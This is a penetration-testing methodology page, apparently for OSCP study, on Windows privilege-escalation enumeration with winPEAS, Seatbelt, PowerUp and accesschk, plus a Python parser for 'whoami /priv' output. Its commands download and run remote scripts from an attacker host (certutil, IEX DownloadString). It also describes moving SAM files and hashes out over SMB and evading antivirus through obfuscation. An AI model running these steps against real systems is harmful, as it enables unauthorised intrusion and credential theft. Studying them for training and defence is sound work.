Windows Privilege Escalation — Enumeration Methodology (winPEAS, Seatbelt, PowerUp, accesschk)
The full workflow of manual commands (whoami /priv, whoami /all, systeminfo) and automated tools (winPEAS, Seatbelt, PowerUp, accesschk, SharpUp) for systematically finding privilege-escalation paths on Windows after the first shell. It is the entry point for all other privesc techniques.
- A shell running on the target Windows host (reverse shell, evil-winrm, RDP or psexec)
- An HTTP/SMB server on the Kali side to serve the tools
Commands
whoami /priv
whoami /all
systeminfo
[System.Environment]::OSVersion.Version; (Get-CimInstance Win32_OperatingSystem).Caption; Get-HotFix | Sort-Object InstalledOn -Descending | Select-Object -First 15
certutil.exe -urlcache -split -f http://{{LHOST}}:{{LPORT}}/winPEASx64.exe C:\Windows\Temp\winpeas.exe
C:\Windows\Temp\winpeas.exe quiet cmd fast
IEX(New-Object Net.WebClient).DownloadString('http://{{LHOST}}:{{LPORT}}/winPEAS.ps1')
IEX(New-Object Net.WebClient).DownloadString('http://{{LHOST}}:{{LPORT}}/PowerUp.ps1'); Invoke-AllChecks
C:\Windows\Temp\Seatbelt.exe -group=all
accesschk.exe /accepteula -uwcqv "Users" *
accesschk.exe /accepteula -wvu "Everyone" "C:\Program Files\VulnApp"
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated & reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
impacket-smbserver share $(pwd) -smb2support
Purpose
Systematic enumeration is the foundation of Windows privesc. First the quick manual checks (token, groups, OS version), then the automated tools (winPEAS, Seatbelt, PowerUp). This page is the starting point for all other privesc techniques; tie every finding to the matching dedicated technique.
Manual Quick Triage
On the first shell, check in this order:
- Token privileges: whoami /priv. If SeImpersonate or SeAssignPrimaryToken is present, go straight to the Potato family (win-seimpersonate-potato); SeDebug/SeBackup/SeRestore/SeLoadDriver are also high value.
- Identity and groups: whoami /all. Groups such as Backup Operators / Server Operators / DnsAdmins open separate paths.
- OS and patches: systeminfo or PowerShell Get-HotFix. The build number is needed both for kernel exploits and for choosing the right Potato.
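A small Python triage helper, added here as an example and not part of this page's tooling: it parses captured `whoami /priv` output against the privileges listed in the triage step and evaluates the two AlwaysInstallElevated `reg query` results from the Commands section. The sample command output is constructed; the privilege-to-technique mapping is the page's own.

```python
import re

# Privileges the triage step singles out, mapped to the next step the page names.
HIGH_VALUE = {
    "SeImpersonatePrivilege": "Potato family (win-seimpersonate-potato)",
    "SeAssignPrimaryTokenPrivilege": "Potato family (win-seimpersonate-potato)",
    "SeDebugPrivilege": "high value",
    "SeBackupPrivilege": "high value",
    "SeRestorePrivilege": "high value",
    "SeLoadDriverPrivilege": "high value",
}

# Constructed sample of `whoami /priv` output for a typical service account.
SAMPLE_PRIV = """\
Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Constructed samples of the two `reg query ... /v AlwaysInstallElevated` results.
SAMPLE_HKLM = """\
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
SAMPLE_HKCU = "ERROR: The system was unable to find the specified registry key or value.\n"


def parse_whoami_priv(text):
    """Map privilege name -> state ('Enabled'/'Disabled') from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = re.match(r"^(Se\w+Privilege)\s+.*\s(Enabled|Disabled)\s*$", line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs


def triage_privileges(text):
    """Return [(privilege, state, next step)] for the privileges worth acting on."""
    privs = parse_whoami_priv(text)
    return [(p, privs[p], HIGH_VALUE[p]) for p in HIGH_VALUE if p in privs]


def always_install_elevated(hklm_out, hkcu_out):
    """True only when BOTH hives set the value to 1; one hive alone is not enough."""
    pat = re.compile(r"AlwaysInstallElevated\s+REG_DWORD\s+0x1\b")
    return bool(pat.search(hklm_out)) and bool(pat.search(hkcu_out))
```

Paste the real command output into the two sample strings; a disabled privilege is still reported with its state so you can see it is held but not currently enabled.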
Automated Tools
winPEAS is the most comprehensive one-click tool; the red highlights are the most critical findings. Running the PowerShell version (winPEAS.ps1) in memory without writing to disk is cleaner from an AV/disk-forensics standpoint.
Seatbelt (GhostPack, C#): with -group=all it dumps the host's security configuration; especially strong on AutoLogon, stored credentials and the UAC level.
PowerUp (Invoke-AllChecks): gives very fast results for service-oriented privescs (unquoted service path, modifiable service, AlwaysInstallElevated) and usually also offers the Write-ServiceBinary / Install-ServiceBinary exploit functions directly.
accesschk (Sysinternals): essential for manual verification. If winPEAS flagged a service as 'modifiable', confirm with accesschk (-uwcqv "Users" *) which rights (SERVICE_CHANGE_CONFIG, WRITE_DAC) are actually present. Older accesschk versions need -accepteula.
Tool Transfer
To move tools to the target, run python3 -m http.server {{LPORT}} or impacket-smbserver on Kali and pull with certutil, PowerShell DownloadString or SMB on the target. Use the same SMB share to move loot (SAM, config, hashes) back.
Notes
- Do the manual token check before running any automated tool; most service accounts (IIS, MSSQL) already carry SeImpersonate, and Potato works without spending time on enumeration.
- In an AV environment winPEAS.exe may be caught; the .ps1 version, obfuscation or piecemeal manual checks are the alternatives.
- The verify-then-exploit discipline is vital on the OSCP: keep the accesschk / sc qc output as a screenshot or log before exploiting.